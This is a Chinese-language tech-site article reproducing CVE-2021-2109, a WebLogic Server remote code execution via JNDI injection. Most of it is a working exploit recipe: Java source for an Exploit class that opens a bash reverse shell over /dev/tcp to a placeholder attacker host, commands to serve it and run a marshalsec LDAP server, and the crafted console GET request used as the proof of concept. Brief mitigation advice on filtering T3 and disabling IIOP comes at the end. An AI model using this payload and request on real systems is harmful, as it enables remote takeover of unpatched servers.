您好,登錄后才能下訂單哦!
本篇文章為大家展示了 如何實(shí)現(xiàn)Weblogic Server遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-2109的分析,內(nèi)容簡(jiǎn)明扼要并且容易理解,絕對(duì)能使你眼前一亮,通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。
CVE-2021-2109 Weblogic遠(yuǎn)程代碼執(zhí)行
Oracle官方發(fā)布了漏洞補(bǔ)丁,修了包括 CVE-2021-2109 Weblogic Server遠(yuǎn)程代碼執(zhí)行漏洞在內(nèi)的多個(gè)高危嚴(yán)重漏洞。CVE-2021-2109 中,攻擊者可構(gòu)造惡意請(qǐng)求,造成JNDI注入,執(zhí)行任意代碼,從而控制服務(wù)器。
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
環(huán)境準(zhǔn)備:WebLogic 10.3.6.0.0(win)
登陸后臺(tái):
http://192.168.1.111:7001/console/login/LoginForm.jsp
啟動(dòng)Ldap服務(wù):
具體方法參考以前的fastjson方式:
Fastjson1.2.47反序列化漏洞復(fù)現(xiàn)
具體地址:https://mp.weixin.qq.com/s/69NCDDSaa07YY7DwyC9fgA
將下面exp保存為Exploit.java文件
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{ public Exploit() throws Exception { //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"}); Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/XXXXXX/34567;cat <&5 | while read line; do $line 2>&5 >&5; done"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { }}
javac Exploit.java 編譯生成Exploit.class文件
python啟動(dòng)web服務(wù)
python -m SimpleHTTPServer 1111
通過(guò)python啟動(dòng)exphttp服務(wù)啟動(dòng)ldap服務(wù)(RMI服務(wù))
本次復(fù)現(xiàn)使用ldap服務(wù),同時(shí)也將RMI對(duì)應(yīng)的操作也做了截圖整理,主要是的原因的RMI的JDk版本支持,LDAPJava的版本本環(huán)境的支持(注意JDK的版本,這個(gè)是可能成功與否的關(guān)鍵)。
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServerhttp://XX.XX.XX.XX:1111/\#Exploit 999
ldap抓包訪問(wèn)修改數(shù)據(jù)包
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;100:389/exp;AdminServer%22) HTTP/1.1Host: 192.168.1.111:7001User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.1.111:7001/console/login/LoginForm.jspConnection: closeCookie: ADMINCONSOLESESSION=UXojCN1Oo-FkguAuuU35Z6tZ2-zmMUTskIjOizb35HOEcL6AwZCl!-2080081994; JSESSIONID=sKsgWcOgre9zQdntt3QYv14IleXkZ94jW9vYYt4fEIOdNBaQtBeV!-1871779164Upgrade-Insecure-Requests: 1
POC:
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;100:389/exp;AdminServer%22) HTTP/1.1
執(zhí)行成功效果
具體的演示demo視頻:https://mp.weixin.qq.com/s/nTfnRlAbAa7WjLsCBRx30g
如果您不依賴T3協(xié)議進(jìn)行JVM通信,可通過(guò)暫時(shí)阻斷T3協(xié)議緩解此漏洞帶來(lái)的影響
1). 進(jìn)入Weblogic控制臺(tái),在base_domain配置頁(yè)面中,進(jìn)入“安全”選項(xiàng)卡頁(yè)面,點(diǎn)擊“篩選器”,配置篩選器。
2). 在連接篩選器中輸入:weblogic.security.net.ConnectionFilterImpl,在連接篩選器規(guī)則框中輸入:* * 7001 deny t3 t3s。
登陸Weblogic控制臺(tái),找到啟用IIOP選項(xiàng),取消勾選,重啟生效
上述內(nèi)容就是 如何實(shí)現(xiàn)Weblogic Server遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-2109的分析,你們學(xué)到知識(shí)或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。